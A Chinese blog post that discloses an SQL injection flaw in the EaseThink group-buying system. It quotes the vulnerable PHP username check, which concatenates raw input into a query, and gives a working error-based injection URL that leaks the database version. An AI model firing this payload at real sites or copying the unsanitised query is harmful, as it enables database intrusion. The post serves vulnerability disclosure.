易想团购 注入 user.php,易想(easethink)团购系统ajax文件导致SQL注入漏洞

这篇博客讨论了易想团购管理系统在用户注册界面存在的一个SQL注入漏洞。通过AJAX进行用户名验证时,由于过滤不严格,攻击者可以利用这一点进行SQL注入攻击。文章提到了具体代码位置,并给出了一个可能的exploit示例,提醒开发者注意此类安全风险。
摘要由CSDN通过智能技术生成

发布时间:2013-04-18 关键词:easethink

易想团购 ajax

sql注入

易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。

在注册界面,输入用户名后台会验证用户名是否存在,这里是通过ajax去验证,目前很多程序都会忽略这里的过滤而导致SQL注入。

system\libs\user.php中:

* 验证会员数据

*/

function check_user($field_name,$field_data)

{

//开始数据验证

$user_data[$field_name] = $field_data;

$res = array('status'=>1,'info'=>'','data'=>''); //用于返回的数据

if(trim($user_data['user_name'])==''&&$field_name=='user_name')

{

$field_item['field_name'] = 'user_name';

$field_item['error'] = EMPTY_ERROR;

$res['status'] = 0;

$res['data'] = $field_item;

return $res;

}

if($field_name=='user_name'&&$GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."user where user_name = '".trim($user_data['user_name'])."' and id <> ".intval($user_data['id']))>0)

//这里的$user_data['user_name']的值是注册用户名提交值,这里只过滤了空格,过滤不严格导致SQL注入漏洞。

{

$field_item['field_name'] = 'user_name';

$field_item['error'] = EXIST_ERROR;

$res['status'] = 0;

$res['data'] = $field_item;

return $res;

}

EXP:

http://目标网址/easethink_free_v1.4/ajax.php?act=check_field&field_name=user_name&field_data='and/**/(select/**/1/**/from/**/(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 53e402bcdef9ce9b54578812dafbf7ce.png

标签:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值